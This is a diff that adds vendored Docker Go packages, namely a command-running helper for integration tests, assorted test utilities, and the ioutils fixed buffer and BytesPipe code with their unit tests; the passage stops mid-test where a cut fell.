+type Cmd struct { + Command []string + Timeout time.Duration + Stdin io.Reader + Stdout io.Writer + Dir string + Env []string +} + +// RunCmd runs a command and returns a Result +func RunCmd(cmd Cmd) *Result { + result := StartCmd(cmd) + if result.Error != nil { + return result + } + return WaitOnCmd(cmd.Timeout, result) +} + +// RunCommand parses a command line and runs it, returning a result +func RunCommand(command string, args ...string) *Result { + return RunCmd(Cmd{Command: append([]string{command}, args...)}) +} + +// StartCmd starts a command, but doesn't wait for it to finish +func StartCmd(cmd Cmd) *Result { + result := buildCmd(cmd) + if result.Error != nil { + return result + } + result.SetExitError(result.Cmd.Start()) + return result +} + +func buildCmd(cmd Cmd) *Result { + var execCmd *exec.Cmd + switch len(cmd.Command) { + case 1: + execCmd = exec.Command(cmd.Command[0]) + default: + execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...) + } + outBuffer := new(lockedBuffer) + errBuffer := new(lockedBuffer) + + execCmd.Stdin = cmd.Stdin + execCmd.Dir = cmd.Dir + execCmd.Env = cmd.Env + if cmd.Stdout != nil { + execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout) + } else { + execCmd.Stdout = outBuffer + } + execCmd.Stderr = errBuffer + return &Result{ + Cmd: execCmd, + outBuffer: outBuffer, + errBuffer: errBuffer, + } +} + +// WaitOnCmd waits for a command to complete. If timeout is non-nil then +// only wait until the timeout. 
+func WaitOnCmd(timeout time.Duration, result *Result) *Result { + if timeout == time.Duration(0) { + result.SetExitError(result.Cmd.Wait()) + return result + } + + done := make(chan error, 1) + // Wait for command to exit in a goroutine + go func() { + done <- result.Cmd.Wait() + }() + + select { + case <-time.After(timeout): + killErr := result.Cmd.Process.Kill() + if killErr != nil { + fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr) + } + result.Timeout = true + case err := <-done: + result.SetExitError(err) + } + return result +} diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go new file mode 100644 index 0000000000..df23442079 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go @@ -0,0 +1,118 @@ +package cmd + +import ( + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestRunCommand(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + var cmd string + if runtime.GOOS == "solaris" { + cmd = "gls" + } else { + cmd = "ls" + } + result := RunCommand(cmd) + result.Assert(t, Expected{}) + + result = RunCommand("doesnotexists") + expectedError := `exec: "doesnotexists": executable file not found` + result.Assert(t, Expected{ExitCode: 127, Error: expectedError}) + + result = RunCommand(cmd, "-z") + result.Assert(t, Expected{ + ExitCode: 2, + Error: "exit status 2", + Err: "invalid option", + }) + assert.Contains(t, result.Combined(), "invalid option") +} + +func TestRunCommandWithCombined(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + result := RunCommand("ls", "-a") + result.Assert(t, Expected{}) + + assert.Contains(t, result.Combined(), "..") + assert.Contains(t, result.Stdout(), "..") +} + 
+func TestRunCommandWithTimeoutFinished(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + result := RunCmd(Cmd{ + Command: []string{"ls", "-a"}, + Timeout: 50 * time.Millisecond, + }) + result.Assert(t, Expected{Out: ".."}) +} + +func TestRunCommandWithTimeoutKilled(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"} + result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond}) + result.Assert(t, Expected{Timeout: true}) + + ones := strings.Split(result.Stdout(), "\n") + assert.Equal(t, len(ones), 4) +} + +func TestRunCommandWithErrors(t *testing.T) { + result := RunCommand("/foobar") + result.Assert(t, Expected{Error: "foobar", ExitCode: 127}) +} + +func TestRunCommandWithStdoutStderr(t *testing.T) { + result := RunCommand("echo", "hello", "world") + result.Assert(t, Expected{Out: "hello world\n", Err: None}) +} + +func TestRunCommandWithStdoutStderrError(t *testing.T) { + result := RunCommand("doesnotexists") + + expected := `exec: "doesnotexists": executable file not found` + result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected}) + + switch runtime.GOOS { + case "windows": + expected = "ls: unknown option" + case "solaris": + expected = "gls: invalid option" + default: + expected = "ls: invalid option" + } + + var cmd string + if runtime.GOOS == "solaris" { + cmd = "gls" + } else { + cmd = "ls" + } + result = RunCommand(cmd, "-z") + result.Assert(t, Expected{ + Out: None, + Err: expected, + ExitCode: 2, + Error: "exit status 2", + }) +} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go new file mode 100644 index 0000000000..f2089c43c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/utils.go @@ -0,0 
+1,227 @@ +package integration + +import ( + "archive/tar" + "errors" + "fmt" + "io" + "os" + "os/exec" + "path/filepath" + "reflect" + "strings" + "syscall" + "time" + + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/pkg/system" +) + +// IsKilled process the specified error and returns whether the process was killed or not. +func IsKilled(err error) bool { + if exitErr, ok := err.(*exec.ExitError); ok { + status, ok := exitErr.Sys().(syscall.WaitStatus) + if !ok { + return false + } + // status.ExitStatus() is required on Windows because it does not + // implement Signal() nor Signaled(). Just check it had a bad exit + // status could mean it was killed (and in tests we do kill) + return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 + } + return false +} + +func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) { + exitCode = 0 + out, err := cmd.CombinedOutput() + exitCode = system.ProcessExitCode(err) + output = string(out) + return +} + +// RunCommandPipelineWithOutput runs the array of commands with the output +// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). +// It returns the final output, the exitCode different from 0 and the error +// if something bad happened. 
+func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { + if len(cmds) < 2 { + return "", 0, errors.New("pipeline does not have multiple cmds") + } + + // connect stdin of each cmd to stdout pipe of previous cmd + for i, cmd := range cmds { + if i > 0 { + prevCmd := cmds[i-1] + cmd.Stdin, err = prevCmd.StdoutPipe() + + if err != nil { + return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) + } + } + } + + // start all cmds except the last + for _, cmd := range cmds[:len(cmds)-1] { + if err = cmd.Start(); err != nil { + return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) + } + } + + defer func() { + var pipeErrMsgs []string + // wait all cmds except the last to release their resources + for _, cmd := range cmds[:len(cmds)-1] { + if pipeErr := cmd.Wait(); pipeErr != nil { + pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) + } + } + if len(pipeErrMsgs) > 0 && err == nil { + err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) + } + }() + + // wait on last cmd + return runCommandWithOutput(cmds[len(cmds)-1]) +} + +// ConvertSliceOfStringsToMap converts a slices of string in a map +// with the strings as key and an empty string as values. +func ConvertSliceOfStringsToMap(input []string) map[string]struct{} { + output := make(map[string]struct{}) + for _, v := range input { + output[v] = struct{}{} + } + return output +} + +// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) +// and returns an error if different. 
+func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + var ( + e1Entries = make(map[string]struct{}) + e2Entries = make(map[string]struct{}) + ) + for _, e := range e1 { + e1Entries[e.Name()] = struct{}{} + } + for _, e := range e2 { + e2Entries[e.Name()] = struct{}{} + } + if !reflect.DeepEqual(e1Entries, e2Entries) { + return fmt.Errorf("entries differ") + } + return nil +} + +// ListTar lists the entries of a tar. +func ListTar(f io.Reader) ([]string, error) { + tr := tar.NewReader(f) + var entries []string + + for { + th, err := tr.Next() + if err == io.EOF { + // end of tar archive + return entries, nil + } + if err != nil { + return entries, err + } + entries = append(entries, th.Name) + } +} + +// RandomTmpDirPath provides a temporary path with rand string appended. +// does not create or checks if it exists. +func RandomTmpDirPath(s string, platform string) string { + tmp := "/tmp" + if platform == "windows" { + tmp = os.Getenv("TEMP") + } + path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10))) + if platform == "windows" { + return filepath.FromSlash(path) // Using \ + } + return filepath.ToSlash(path) // Using / +} + +// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping +// for interval duration. Returns total read bytes. Send true to the +// stop channel to return before reading to EOF on the reader. +func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + buffer := make([]byte, chunkSize) + for { + var readBytes int + readBytes, err = reader.Read(buffer) + n += readBytes + if err != nil { + if err == io.EOF { + err = nil + } + return + } + select { + case <-stop: + return + case <-time.After(interval): + } + } +} + +// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns +// a map which cgroup name as key and path as value. 
+func ParseCgroupPaths(procCgroupData string) map[string]string { + cgroupPaths := map[string]string{} + for _, line := range strings.Split(procCgroupData, "\n") { + parts := strings.Split(line, ":") + if len(parts) != 3 { + continue + } + cgroupPaths[parts[1]] = parts[2] + } + return cgroupPaths +} + +// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. +type ChannelBuffer struct { + C chan []byte +} + +// Write implements Writer. +func (c *ChannelBuffer) Write(b []byte) (int, error) { + c.C <- b + return len(b), nil +} + +// Close closes the go channel. +func (c *ChannelBuffer) Close() error { + close(c.C) + return nil +} + +// ReadTimeout reads the content of the channel in the specified byte array with +// the specified duration as timeout. +func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { + select { + case b := <-c.C: + return copy(p[0:], b), nil + case <-time.After(n): + return -1, fmt.Errorf("timeout reading from channel") + } +} + +// RunAtDifferentDate runs the specified function with the given time. +// It changes the date of the system, which can led to weird behaviors. +func RunAtDifferentDate(date time.Time, block func()) { + // Layout for date. 
MMDDhhmmYYYY + const timeLayout = "010203042006" + // Ensure we bring time back to now + now := time.Now().Format(timeLayout) + defer icmd.RunCommand("date", now) + + icmd.RunCommand("date", date.Format(timeLayout)) + block() + return +} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go new file mode 100644 index 0000000000..0b2ef4aff5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/utils_test.go @@ -0,0 +1,363 @@ +package integration + +import ( + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + "time" +) + +func TestIsKilledFalseWithNonKilledProcess(t *testing.T) { + var lsCmd *exec.Cmd + if runtime.GOOS != "windows" { + lsCmd = exec.Command("ls") + } else { + lsCmd = exec.Command("cmd", "/c", "dir") + } + + err := lsCmd.Run() + if IsKilled(err) { + t.Fatalf("Expected the ls command to not be killed, was.") + } +} + +func TestIsKilledTrueWithKilledProcess(t *testing.T) { + var longCmd *exec.Cmd + if runtime.GOOS != "windows" { + longCmd = exec.Command("top") + } else { + longCmd = exec.Command("powershell", "while ($true) { sleep 1 }") + } + + // Start a command + err := longCmd.Start() + if err != nil { + t.Fatal(err) + } + // Capture the error when *dying* + done := make(chan error, 1) + go func() { + done <- longCmd.Wait() + }() + // Then kill it + longCmd.Process.Kill() + // Get the error + err = <-done + if !IsKilled(err) { + t.Fatalf("Expected the command to be killed, was not.") + } +} + +func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) { + _, _, err := RunCommandPipelineWithOutput(exec.Command("ls")) + expectedError := "pipeline does not have multiple cmds" + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with %s, got err:%s", expectedError, err) + } +} + +func TestRunCommandPipelineWithOutputErrors(t *testing.T) { + p := "$PATH" + if runtime.GOOS == 
"windows" { + p = "%PATH%" + } + cmd1 := exec.Command("ls") + cmd1.Stdout = os.Stdout + cmd2 := exec.Command("anything really") + _, _, err := RunCommandPipelineWithOutput(cmd1, cmd2) + if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" { + t.Fatalf("Expected an error, got %v", err) + } + + cmdWithError := exec.Command("doesnotexists") + cmdCat := exec.Command("cat") + _, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat) + if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p { + t.Fatalf("Expected an error, got %v", err) + } +} + +func TestRunCommandPipelineWithOutput(t *testing.T) { + //TODO: Should run on Solaris + if runtime.GOOS == "solaris" { + t.Skip() + } + cmds := []*exec.Cmd{ + // Print 2 characters + exec.Command("echo", "-n", "11"), + // Count the number or char from stdin (previous command) + exec.Command("wc", "-m"), + } + out, exitCode, err := RunCommandPipelineWithOutput(cmds...) 
+ expectedOutput := "2\n" + if out != expectedOutput || exitCode != 0 || err != nil { + t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err) + } +} + +func TestConvertSliceOfStringsToMap(t *testing.T) { + input := []string{"a", "b"} + actual := ConvertSliceOfStringsToMap(input) + for _, key := range input { + if _, ok := actual[key]; !ok { + t.Fatalf("Expected output to contains key %s, did not: %v", key, actual) + } + } +} + +func TestCompareDirectoryEntries(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + + file1 := filepath.Join(tmpFolder, "file1") + file2 := filepath.Join(tmpFolder, "file2") + os.Create(file1) + os.Create(file2) + + fi1, err := os.Stat(file1) + if err != nil { + t.Fatal(err) + } + fi1bis, err := os.Stat(file1) + if err != nil { + t.Fatal(err) + } + fi2, err := os.Stat(file2) + if err != nil { + t.Fatal(err) + } + + cases := []struct { + e1 []os.FileInfo + e2 []os.FileInfo + shouldError bool + }{ + // Empty directories + { + []os.FileInfo{}, + []os.FileInfo{}, + false, + }, + // Same FileInfos + { + []os.FileInfo{fi1}, + []os.FileInfo{fi1}, + false, + }, + // Different FileInfos but same names + { + []os.FileInfo{fi1}, + []os.FileInfo{fi1bis}, + false, + }, + // Different FileInfos, different names + { + []os.FileInfo{fi1}, + []os.FileInfo{fi2}, + true, + }, + } + for _, elt := range cases { + err := CompareDirectoryEntries(elt.e1, elt.e2) + if elt.shouldError && err == nil { + t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2) + } + if !elt.shouldError && err != nil { + t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2) + } + } +} + +// FIXME make an "unhappy path" test for ListTar without "panicking" :-) +func TestListTar(t *testing.T) { + // TODO Windows: Figure out why this fails. 
Should be portable. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows - needs further investigation") + } + tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + + // Let's create a Tar file + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(srcFile) + cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + reader, err := os.Open(tarFile) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + entries, err := ListTar(reader) + if err != nil { + t.Fatal(err) + } + if len(entries) != 1 && entries[0] != "src" { + t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries) + } +} + +func TestRandomTmpDirPath(t *testing.T) { + path := RandomTmpDirPath("something", runtime.GOOS) + + prefix := "/tmp/something" + if runtime.GOOS == "windows" { + prefix = os.Getenv("TEMP") + `\something` + } + expectedSize := len(prefix) + 11 + + if !strings.HasPrefix(path, prefix) { + t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path) + } + if len(path) != expectedSize { + t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path)) + } +} + +func TestConsumeWithSpeed(t *testing.T) { + reader := strings.NewReader("1234567890") + chunksize := 2 + + bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil) + if err != nil { + t.Fatal(err) + } + + if bytes1 != 10 { + t.Fatalf("Expected to have read 10 bytes, got %d", bytes1) + } + +} + +func TestConsumeWithSpeedWithStop(t *testing.T) { + reader := strings.NewReader("1234567890") + chunksize := 2 + + stopIt := make(chan bool) + + go func() { + time.Sleep(1 * time.Millisecond) + stopIt <- true + }() + + bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt) + if err != nil { + t.Fatal(err) + } + + if 
bytes1 != 2 { + t.Fatalf("Expected to have read 2 bytes, got %d", bytes1) + } + +} + +func TestParseCgroupPathsEmpty(t *testing.T) { + cgroupMap := ParseCgroupPaths("") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } + cgroupMap = ParseCgroupPaths("\n") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } + cgroupMap = ParseCgroupPaths("something:else\nagain:here") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } +} + +func TestParseCgroupPaths(t *testing.T) { + cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b") + if len(cgroupMap) != 2 { + t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap) + } + if value, ok := cgroupMap["memory"]; !ok || value != "/a" { + t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap) + } + if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" { + t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap) + } +} + +func TestChannelBufferTimeout(t *testing.T) { + expected := "11" + + buf := &ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + done := make(chan struct{}, 1) + go func() { + time.Sleep(100 * time.Millisecond) + io.Copy(buf, strings.NewReader(expected)) + done <- struct{}{} + }() + + // Wait long enough + b := make([]byte, 2) + _, err := buf.ReadTimeout(b, 50*time.Millisecond) + if err == nil && err.Error() != "timeout reading from channel" { + t.Fatalf("Expected an error, got %s", err) + } + <-done +} + +func TestChannelBuffer(t *testing.T) { + expected := "11" + + buf := &ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + go func() { + time.Sleep(100 * time.Millisecond) + io.Copy(buf, strings.NewReader(expected)) + }() + + // Wait long enough + b := make([]byte, 2) + _, err := buf.ReadTimeout(b, 200*time.Millisecond) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + 
t.Fatalf("Expected '%s', got '%s'", expected, string(b)) + } +} + +// FIXME doesn't work +// func TestRunAtDifferentDate(t *testing.T) { +// var date string + +// // Layout for date. MMDDhhmmYYYY +// const timeLayout = "20060102" +// expectedDate := "20100201" +// theDate, err := time.Parse(timeLayout, expectedDate) +// if err != nil { +// t.Fatal(err) +// } + +// RunAtDifferentDate(theDate, func() { +// cmd := exec.Command("date", "+%Y%M%d") +// out, err := cmd.Output() +// if err != nil { +// t.Fatal(err) +// } +// date = string(out) +// }) +// } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go new file mode 100644 index 0000000000..3d737b3e19 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go @@ -0,0 +1,51 @@ +package ioutils + +import ( + "errors" + "io" +) + +var errBufferFull = errors.New("buffer is full") + +type fixedBuffer struct { + buf []byte + pos int + lastRead int +} + +func (b *fixedBuffer) Write(p []byte) (int, error) { + n := copy(b.buf[b.pos:cap(b.buf)], p) + b.pos += n + + if n < len(p) { + if b.pos == cap(b.buf) { + return n, errBufferFull + } + return n, io.ErrShortWrite + } + return n, nil +} + +func (b *fixedBuffer) Read(p []byte) (int, error) { + n := copy(p, b.buf[b.lastRead:b.pos]) + b.lastRead += n + return n, nil +} + +func (b *fixedBuffer) Len() int { + return b.pos - b.lastRead +} + +func (b *fixedBuffer) Cap() int { + return cap(b.buf) +} + +func (b *fixedBuffer) Reset() { + b.pos = 0 + b.lastRead = 0 + b.buf = b.buf[:0] +} + +func (b *fixedBuffer) String() string { + return string(b.buf[b.lastRead:b.pos]) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go new file mode 100644 index 0000000000..41098fa6e7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go @@ -0,0 +1,75 @@ +package ioutils + +import ( + "bytes" + "testing" +) + 
+func TestFixedBufferWrite(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 64)} + n, err := buf.Write([]byte("hello")) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes written, got %d", n) + } + + if string(buf.buf[:5]) != "hello" { + t.Fatalf("expected \"hello\", got %q", string(buf.buf[:5])) + } + + n, err = buf.Write(bytes.Repeat([]byte{1}, 64)) + if err != errBufferFull { + t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64]) + } +} + +func TestFixedBufferRead(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 64)} + if _, err := buf.Write([]byte("hello world")); err != nil { + t.Fatal(err) + } + + b := make([]byte, 5) + n, err := buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes read, got %d - %s", n, buf.String()) + } + + if string(b) != "hello" { + t.Fatalf("expected \"hello\", got %q", string(b)) + } + + n, err = buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes read, got %d", n) + } + + if string(b) != " worl" { + t.Fatalf("expected \" worl\", got %s", string(b)) + } + + b = b[:1] + n, err = buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 1 { + t.Fatalf("expected 1 byte read, got %d - %s", n, buf.String()) + } + + if string(b) != "d" { + t.Fatalf("expected \"d\", got %s", string(b)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go new file mode 100644 index 0000000000..72a04f3491 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go @@ -0,0 +1,186 @@ +package ioutils + +import ( + "errors" + "io" + "sync" +) + +// maxCap is the highest capacity to use in byte slices that buffer data. 
+const maxCap = 1e6 + +// minCap is the lowest capacity to use in byte slices that buffer data +const minCap = 64 + +// blockThreshold is the minimum number of bytes in the buffer which will cause +// a write to BytesPipe to block when allocating a new slice. +const blockThreshold = 1e6 + +var ( + // ErrClosed is returned when Write is called on a closed BytesPipe. + ErrClosed = errors.New("write to closed BytesPipe") + + bufPools = make(map[int]*sync.Pool) + bufPoolsLock sync.Mutex +) + +// BytesPipe is io.ReadWriteCloser which works similarly to pipe(queue). +// All written data may be read at most once. Also, BytesPipe allocates +// and releases new byte slices to adjust to current needs, so the buffer +// won't be overgrown after peak loads. +type BytesPipe struct { + mu sync.Mutex + wait *sync.Cond + buf []*fixedBuffer + bufLen int + closeErr error // error to return from next Read. set to nil if not closed. +} + +// NewBytesPipe creates new BytesPipe, initialized by specified slice. +// If buf is nil, then it will be initialized with slice which cap is 64. +// buf will be adjusted in a way that len(buf) == 0, cap(buf) == cap(buf). +func NewBytesPipe() *BytesPipe { + bp := &BytesPipe{} + bp.buf = append(bp.buf, getBuffer(minCap)) + bp.wait = sync.NewCond(&bp.mu) + return bp +} + +// Write writes p to BytesPipe. +// It can allocate new []byte slices in a process of writing. 
+func (bp *BytesPipe) Write(p []byte) (int, error) { + bp.mu.Lock() + + written := 0 +loop0: + for { + if bp.closeErr != nil { + bp.mu.Unlock() + return written, ErrClosed + } + + if len(bp.buf) == 0 { + bp.buf = append(bp.buf, getBuffer(64)) + } + // get the last buffer + b := bp.buf[len(bp.buf)-1] + + n, err := b.Write(p) + written += n + bp.bufLen += n + + // errBufferFull is an error we expect to get if the buffer is full + if err != nil && err != errBufferFull { + bp.wait.Broadcast() + bp.mu.Unlock() + return written, err + } + + // if there was enough room to write all then break + if len(p) == n { + break + } + + // more data: write to the next slice + p = p[n:] + + // make sure the buffer doesn't grow too big from this write + for bp.bufLen >= blockThreshold { + bp.wait.Wait() + if bp.closeErr != nil { + continue loop0 + } + } + + // add new byte slice to the buffers slice and continue writing + nextCap := b.Cap() * 2 + if nextCap > maxCap { + nextCap = maxCap + } + bp.buf = append(bp.buf, getBuffer(nextCap)) + } + bp.wait.Broadcast() + bp.mu.Unlock() + return written, nil +} + +// CloseWithError causes further reads from a BytesPipe to return immediately. +func (bp *BytesPipe) CloseWithError(err error) error { + bp.mu.Lock() + if err != nil { + bp.closeErr = err + } else { + bp.closeErr = io.EOF + } + bp.wait.Broadcast() + bp.mu.Unlock() + return nil +} + +// Close causes further reads from a BytesPipe to return immediately. +func (bp *BytesPipe) Close() error { + return bp.CloseWithError(nil) +} + +// Read reads bytes from BytesPipe. +// Data could be read only once. 
+func (bp *BytesPipe) Read(p []byte) (n int, err error) { + bp.mu.Lock() + if bp.bufLen == 0 { + if bp.closeErr != nil { + bp.mu.Unlock() + return 0, bp.closeErr + } + bp.wait.Wait() + if bp.bufLen == 0 && bp.closeErr != nil { + err := bp.closeErr + bp.mu.Unlock() + return 0, err + } + } + + for bp.bufLen > 0 { + b := bp.buf[0] + read, _ := b.Read(p) // ignore error since fixedBuffer doesn't really return an error + n += read + bp.bufLen -= read + + if b.Len() == 0 { + // it's empty so return it to the pool and move to the next one + returnBuffer(b) + bp.buf[0] = nil + bp.buf = bp.buf[1:] + } + + if len(p) == read { + break + } + + p = p[read:] + } + + bp.wait.Broadcast() + bp.mu.Unlock() + return +} + +func returnBuffer(b *fixedBuffer) { + b.Reset() + bufPoolsLock.Lock() + pool := bufPools[b.Cap()] + bufPoolsLock.Unlock() + if pool != nil { + pool.Put(b) + } +} + +func getBuffer(size int) *fixedBuffer { + bufPoolsLock.Lock() + pool, ok := bufPools[size] + if !ok { + pool = &sync.Pool{New: func() interface{} { return &fixedBuffer{buf: make([]byte, 0, size)} }} + bufPools[size] = pool + } + bufPoolsLock.Unlock() + return pool.Get().(*fixedBuffer) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go new file mode 100644 index 0000000000..300fb5f6d5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go @@ -0,0 +1,159 @@ +package ioutils + +import ( + "crypto/sha1" + "encoding/hex" + "math/rand" + "testing" + "time" +) + +func TestBytesPipeRead(t *testing.T) { + buf := NewBytesPipe() + buf.Write([]byte("12")) + buf.Write([]byte("34")) + buf.Write([]byte("56")) + buf.Write([]byte("78")) + buf.Write([]byte("90")) + rd := make([]byte, 4) + n, err := buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 4 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4) + } + if string(rd) != "1234" { + t.Fatalf("Read %s, but must be %s", rd, "1234") 
+ } + n, err = buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 4 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4) + } + if string(rd) != "5678" { + t.Fatalf("Read %s, but must be %s", rd, "5679") + } + n, err = buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 2 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 2) + } + if string(rd[:n]) != "90" { + t.Fatalf("Read %s, but must be %s", rd, "90") + } +} + +func TestBytesPipeWrite(t *testing.T) { + buf := NewBytesPipe() + buf.Write([]byte("12")) + buf.Write([]byte("34")) + buf.Write([]byte("56")) + buf.Write([]byte("78")) + buf.Write([]byte("90")) + if buf.buf[0].String() != "1234567890" { + t.Fatalf("Buffer %q, must be %q", buf.buf[0].String(), "1234567890") + } +} + +// Write and read in different speeds/chunk sizes and check valid data is read. +func TestBytesPipeWriteRandomChunks(t *testing.T) { + cases := []struct{ iterations, writesPerLoop, readsPerLoop int }{ + {100, 10, 1}, + {1000, 10, 5}, + {1000, 100, 0}, + {1000, 5, 6}, + {10000, 50, 25}, + } + + testMessage := []byte("this is a random string for testing") + // random slice sizes to read and write + writeChunks := []int{25, 35, 15, 20} + readChunks := []int{5, 45, 20, 25} + + for _, c := range cases { + // first pass: write directly to hash + hash := sha1.New() + for i := 0; i < c.iterations*c.writesPerLoop; i++ { + if _, err := hash.Write(testMessage[:writeChunks[i%len(writeChunks)]]); err != nil { + t.Fatal(err) + } + } + expected := hex.EncodeToString(hash.Sum(nil)) + + // write/read through buffer + buf := NewBytesPipe() + hash.Reset() + + done := make(chan struct{}) + + go func() { + // random delay before read starts + <-time.After(time.Duration(rand.Intn(10)) * time.Millisecond) + for i := 0; ; i++ { + p := make([]byte, readChunks[(c.iterations*c.readsPerLoop+i)%len(readChunks)]) + n, _ := buf.Read(p) + if n == 0 { + break + } + hash.Write(p[:n]) + } + + close(done) + }() + + for i := 0; i < 
